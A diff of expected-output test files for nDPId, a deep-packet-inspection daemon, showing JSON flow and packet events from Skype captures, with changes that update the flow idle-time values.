00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -1462,8 +1462,8 @@ 00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.162","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969679451,"flow_last_seen":1431969698502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50065,"dst_port":40031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969679451,"flow_last_seen":1431969698502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50065,"dst_port":40031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969679451,"flow_last_seen":1431969698502,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50065,"dst_port":40031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969679451,"flow_last_seen":1431969698502,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50065,"dst_port":40031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","packets-captured":3284,"packets-processed":3069,"total-skipped-flows":0,"total-l4-data-len":444195,"total-not-detected-flows":61,"total-guessed-flows":32,"total-detected-flows":200,"total-detection-updates":7,"total-updates":0,"current-active-flows":0,"total-active-flows":293,"total-idle-flows":293,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1467,"global_ts_msec":1431969808951} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3284/3069 diff --git a/test/results/skype_no_unknown.pcap.out b/test/results/skype_no_unknown.pcap.out index 974337dcc..8b65e4a38 100644 --- a/test/results/skype_no_unknown.pcap.out +++ b/test/results/skype_no_unknown.pcap.out @@ -29,28 +29,28 @@ 00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634669,"flow_last_seen":1431970634669,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431970634669,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1431970634723,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1431970634723,"pkt":"PBXCt3IO0NQSxnP1CABFAACYAABAAEARtuHAqAEBwKgBIgA14V4AhKxSjTWBgAABAAAAAQAADkRCM01TR1I1MDExNzA5B2dhdGV3YXkJbWVzc2VuZ2VyBGxpdmUDY29tAAAcAAHALQAGAAEAAAbhADUDbnMxBG1zZnQDbmV0AAZtc25oc3QJbWljcm9zb2Z0wDJ4Gz7uAAAcIAAAA4QAJOoAAAAOEA=="} 00811{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970634669,"flow_last_seen":1431970634723,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1431970634723,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634728,"flow_last_seen":1431970634728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970634728,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51229,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1431970634728,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970634728,"pkt":"0NQSxnP1PBXCt3IOCABFAABADqBAAEAGmPnAqAEinTg0HMgdnEkK2QRYAAAAALAC\/\/9q8wAAAgQFtAEDAwUBAQgKPjGHIQAAAAAEAgAA"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634728,"flow_last_seen":1431970634728,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970634728,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51229,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1431970634728,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970634728,"pkt":"0NQSxnP1PBXCt3IOCABFAABADqBAAEAGmPnAqAEinTg0HMgdnEkK2QRYAAAAALAC\/\/9q8wAAAgQFtAEDAwUBAQgKPjGHIQAAAAAEAgAA"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634728,"flow_last_seen":1431970634728,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970634728,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62875,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1431970634728,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970634728,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/L\/oAAEARx0DAqAEiwKgBAfWbADUAK9VUuF8BAAABAAAAAAAABWRzbjEzAWQFc2t5cGUDbmV0AAABAAE="} 00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634728,"flow_last_seen":1431970634728,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970634728,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62875,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn13.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634729,"flow_last_seen":1431970634729,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970634729,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59113,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1431970634729,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970634729,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/lFMAAEARYufAqAEiwKgBAebpADUAK335A20BAAABAAAAAAAABWRzbjEzAWQFc2t5cGUDbmV0AAAcAAE="} 00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634729,"flow_last_seen":1431970634729,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970634729,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59113,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn13.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634729,"flow_last_seen":1431970634729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970634729,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1431970634729,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970634729,"pkt":"0NQSxnP1PBXCt3IOCABFAABAt4dAAEAGpVrAqAEinTh+08geAbsxSRU0AAAAALAC\/\/+DfQAAAgQFtAEDAwUBAQgKPjGHIQAAAAAEAgAA"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634729,"flow_last_seen":1431970634729,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970634729,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1431970634729,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970634729,"pkt":"0NQSxnP1PBXCt3IOCABFAABAt4dAAEAGpVrAqAEinTh+08geAbsxSRU0AAAAALAC\/\/+DfQAAAgQFtAEDAwUBAQgKPjGHIQAAAAAEAgAA"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634730,"flow_last_seen":1431970634730,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970634730,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57592,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1431970634730,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970634730,"pkt":"0NQSxnP1PBXCt3IOCABFAABLIWAAAEAR1c7AqAEiwKgBAeD4ADUANz9NJ5kBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDExAXIFc2t5cGUDbmV0AAABAAE="} 00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634730,"flow_last_seen":1431970634730,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970634730,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57592,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst11.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634731,"flow_last_seen":1431970634731,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970634731,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":53372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1431970634731,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970634731,"pkt":"0NQSxnP1PBXCt3IOCABFAABL+hcAAEAR\/RbAqAEiwKgBAdB8ADUAN25j7f4BAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDExAXIFc2t5cGUDbmV0AAAcAAE="} 00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634731,"flow_last_seen":1431970634731,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970634731,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":53372,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst11.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1431970634805,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970634805,"pkt":"PBXCt3IO0NQSxnP1CABFAAA4BUNAAHYGIaedOH7TwKgBIgG7yB4Nim5XMUkVNZASIABVdAAAAgQFrAQCCAoZLZ4CPjGHIQ=="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1431970634805,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970634805,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0\/VlAAEAGX5TAqAEinTh+08geAbsxSRU1DYpuWIAQ\/\/+P3gAAAQEICj4xh20ZLZ4C"} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970634729,"flow_last_seen":1431970634832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431970634832,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1431970634933,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970634933,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtJ2dODQcwKgBIpxJyB3uE3m5CtkEWaASOJCk1gAAAgQFrAQCCApMX+pXPjGHIQEDAwk="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1431970634934,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970634934,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0Qp9AAEAGZQbAqAEinTg0HMgdnEkK2QRZ7hN5uoAQECz7NQAAAQEICj4xh+xMX+pX"} -01411{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1431970634729,"flow_last_seen":1431970634990,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3792,"flow_avg_l4_payload_len":421,"midstream":0,"thread_ts_msec":1431970634990,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.gateway.messenger.live.com,*.beta.gateway.edge.messenger.live.com,*.by2.gateway.edge.messenger.live.com,*.sn1.gateway.edge.messenger.live.com","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"5e4e5596180ebd0ac0317125ee490707","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT SSL SHA2","subjectDN":"CN=*.gateway.messenger.live.com","fingerprint":"95:C4:07:41:85:D4:EF:AA:D9:1F:0F:1F:3C:08:BF:8E:8B:D0:90:51"}} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1431970634805,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970634805,"pkt":"PBXCt3IO0NQSxnP1CABFAAA4BUNAAHYGIaedOH7TwKgBIgG7yB4Nim5XMUkVNZASIABVdAAAAgQFrAQCCAoZLZ4CPjGHIQ=="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1431970634805,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970634805,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0\/VlAAEAGX5TAqAEinTh+08geAbsxSRU1DYpuWIAQ\/\/+P3gAAAQEICj4xh20ZLZ4C"} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970634729,"flow_last_seen":1431970634832,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431970634832,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 